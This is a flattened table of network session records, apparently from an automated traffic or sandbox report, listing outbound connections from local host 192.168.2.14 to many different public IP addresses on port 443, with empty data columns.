                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11206192.168.2.1450838179.92.177.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11207192.168.2.1442806168.5.222.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11208192.168.2.146090081.54.85.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11209192.168.2.1452062137.145.97.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11210192.168.2.1433844208.197.208.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11211192.168.2.1456108193.245.98.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11212192.168.2.1445712165.206.199.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11213192.168.2.145570063.67.56.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11214192.168.2.143949848.168.87.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11215192.168.2.143986493.62.105.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11216192.168.2.1445340208.122.219.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11217192.168.2.145700248.223.230.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11218192.168.2.1457386198.25.223.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11219192.168.2.1457810155.249.167.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11220192.168.2.144814831.145.53.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11221192.168.2.1448806102.78.192.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11222192.168.2.1460354104.167.108.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11223192.168.2.1435708141.22.172.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11224192.168.2.1457292180.222.142.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11225192.168.2.1448236124.11.152.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11226192.168.2.145070872.168.161.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11227192.168.2.143909223.73.130.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11228192.168.2.1459812218.245.137.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11229192.168.2.1454194171.180.223.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11230192.168.2.143804412.86.133.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11231192.168.2.145875062.5.170.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11232192.168.2.1450056165.92.45.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11233192.168.2.1456366178.149.224.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11234192.168.2.1442460168.199.87.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11235192.168.2.1445066125.224.218.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11236192.168.2.1445862115.173.97.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11237192.168.2.14495025.95.67.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11238192.168.2.1447880126.55.209.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11239192.168.2.144562291.127.84.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11240192.168.2.145112251.248.164.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11241192.168.2.144035661.107.46.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11242192.168.2.143679034.84.214.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11243192.168.2.144901643.125.175.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11244192.168.2.1446428159.216.211.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11245192.168.2.1438624222.37.46.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11246192.168.2.1446796192.254.250.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11247192.168.2.1455032111.122.141.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11248192.168.2.143460292.86.152.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11249192.168.2.1449976119.48.116.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11250192.168.2.145433864.8.214.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11251192.168.2.1439458136.96.34.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11252192.168.2.1434890145.240.70.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11253192.168.2.1447554140.100.11.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11254192.168.2.145370260.111.138.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11255192.168.2.143909252.176.233.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11256192.168.2.144650657.228.179.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11257192.168.2.145769897.25.25.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11258192.168.2.1454440192.6.185.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11259192.168.2.1458642119.92.122.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11260192.168.2.1439556168.119.176.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11261192.168.2.144237438.147.1.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11262192.168.2.144138847.235.187.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11263192.168.2.1437776202.149.205.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11264192.168.2.143414078.227.228.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11265192.168.2.145479854.88.94.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11266192.168.2.1432788176.103.144.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11267192.168.2.143376854.197.236.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11268192.168.2.145707885.53.41.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11269192.168.2.1446726107.123.181.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11270192.168.2.144479882.234.146.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11271192.168.2.1440966113.86.62.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11272192.168.2.1444156166.255.81.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11273192.168.2.1456850125.87.122.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11274192.168.2.1435474191.74.94.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11275192.168.2.1439064101.46.129.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11276192.168.2.1455978204.186.50.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11277192.168.2.1459732198.146.132.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11278192.168.2.145963831.172.66.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11279192.168.2.1456736142.128.125.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11280192.168.2.1455398107.217.7.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11281192.168.2.145540424.171.230.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11282192.168.2.14404048.130.232.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11283192.168.2.1458414180.110.49.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11284192.168.2.143814682.237.113.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11285192.168.2.145910439.49.171.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11286192.168.2.1455670146.16.208.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11287192.168.2.1451560194.16.141.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11288192.168.2.1449082198.45.88.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11289192.168.2.144682291.162.96.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11290192.168.2.143285249.189.118.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11291192.168.2.1455358182.49.176.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11292192.168.2.1448140164.197.186.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11293192.168.2.1456454152.137.15.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11294192.168.2.145937481.188.77.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11295192.168.2.14417549.19.16.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11296192.168.2.1457040187.21.165.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11297192.168.2.1452804203.40.98.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11298192.168.2.1458296104.189.122.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11299192.168.2.145735236.120.228.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11300192.168.2.1458630133.158.236.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11301192.168.2.1448388221.43.222.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11302192.168.2.143439840.119.99.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11303192.168.2.144797662.31.134.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11304192.168.2.146046872.94.39.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11305192.168.2.1451940118.90.165.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11306192.168.2.145394896.228.149.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11307192.168.2.144692623.29.105.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11308192.168.2.1457090131.109.119.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11309192.168.2.145213427.166.178.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11310192.168.2.145365258.199.96.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11311192.168.2.1459478142.74.121.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11312192.168.2.14531948.39.100.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11313192.168.2.144880627.106.167.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11314192.168.2.143593492.75.211.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11315192.168.2.1454366107.233.5.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11316192.168.2.146039439.93.103.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11317192.168.2.144601664.228.118.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11318192.168.2.144226293.55.146.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11319192.168.2.145721044.90.244.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11320192.168.2.1457524198.103.4.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11321192.168.2.1437384175.171.180.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11322192.168.2.145896062.237.78.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11323192.168.2.143819276.112.59.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11324192.168.2.145745027.85.144.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11325192.168.2.1457810123.135.65.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11326192.168.2.1437968156.119.37.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11327192.168.2.1435660131.51.189.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11328192.168.2.1442102194.104.94.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11329192.168.2.1446920104.138.104.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11330192.168.2.144747066.229.188.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11331192.168.2.1446904137.220.189.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11332192.168.2.1441834165.27.6.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11333192.168.2.144655053.3.27.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11334192.168.2.144486888.3.214.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11335192.168.2.145096298.217.7.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11336192.168.2.145382668.212.58.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11337192.168.2.1443868105.103.27.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11338192.168.2.144370040.103.71.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11339192.168.2.1455644219.20.85.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11340192.168.2.145545291.145.119.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11341192.168.2.1440096212.203.30.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11342192.168.2.1435592207.232.112.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11343192.168.2.1440074138.223.185.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11344192.168.2.143434243.169.17.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11345192.168.2.1438974201.18.57.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11346192.168.2.1441468156.185.104.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11347192.168.2.14409304.217.213.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11348192.168.2.145965891.133.221.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11349192.168.2.1435384181.122.121.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11350192.168.2.1458020152.183.252.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11351192.168.2.1439208131.139.253.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11352192.168.2.144564286.216.168.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11353192.168.2.1448122189.118.185.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11354192.168.2.14341061.91.174.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11355192.168.2.144725871.252.122.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11356192.168.2.144955473.201.118.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11357192.168.2.144540489.88.193.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11358192.168.2.145171677.158.168.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11359192.168.2.1441390114.222.142.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11360192.168.2.1433526112.212.228.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11361192.168.2.145127695.30.227.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11362192.168.2.145604688.56.205.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11363192.168.2.14508724.101.168.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11364192.168.2.1452170130.153.243.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11365192.168.2.1457414213.112.223.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11366192.168.2.143455683.220.58.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11367192.168.2.143822496.198.246.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11368192.168.2.1452882204.222.78.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11369192.168.2.143343239.78.80.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11370192.168.2.145199871.123.151.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11371192.168.2.1458396167.4.117.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11372192.168.2.1445034161.68.74.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11373192.168.2.1433522175.180.246.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11374192.168.2.143963475.186.185.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11375192.168.2.1454804105.116.191.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11376192.168.2.1445968100.182.254.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11377192.168.2.1435660190.250.134.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11378192.168.2.143433289.207.184.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11379192.168.2.1443588211.81.23.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11380192.168.2.1452558220.134.216.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11381192.168.2.1445902213.209.55.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11382192.168.2.144675458.146.186.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11383192.168.2.1438402145.129.249.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11384192.168.2.143664632.239.226.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11385192.168.2.145676243.20.47.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11386192.168.2.1458368130.217.94.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11387192.168.2.1456388130.105.90.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11388192.168.2.1452810141.35.70.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11389192.168.2.145812098.19.244.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11390192.168.2.145440690.246.235.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11391192.168.2.145454473.135.217.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11392192.168.2.1449900149.186.125.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11393192.168.2.1438806219.103.78.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11394192.168.2.1438098212.159.71.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11395192.168.2.144668695.212.82.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11396192.168.2.1455406189.248.223.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11397192.168.2.145256286.179.180.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11398192.168.2.1433030151.47.202.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11399192.168.2.1450462216.171.64.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11400192.168.2.1455218115.0.149.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11401192.168.2.144382251.139.150.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11402192.168.2.146033035.96.128.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11403192.168.2.144976452.155.106.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11404192.168.2.143642686.9.21.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11405192.168.2.143721296.125.226.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11406192.168.2.1441764193.13.119.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11407192.168.2.1458826148.147.53.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11408192.168.2.1444350194.24.94.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11409192.168.2.144812687.132.193.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11410192.168.2.14605229.224.37.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11411192.168.2.1447972201.52.114.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11412192.168.2.1453900115.1.244.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11413192.168.2.1446924186.159.2.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11414192.168.2.1444692188.219.0.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11415192.168.2.1447816136.110.21.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11416192.168.2.144695424.181.119.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11417192.168.2.145452247.123.170.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11418192.168.2.143709653.30.208.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11419192.168.2.1443462144.232.253.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11420192.168.2.1438606204.233.132.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11421192.168.2.1447156219.56.16.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11422192.168.2.144748025.181.145.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11423192.168.2.143961441.26.62.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11424192.168.2.1433420183.97.93.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11425192.168.2.144232882.42.221.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11426192.168.2.1434960219.44.193.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11427192.168.2.144950057.52.242.32443
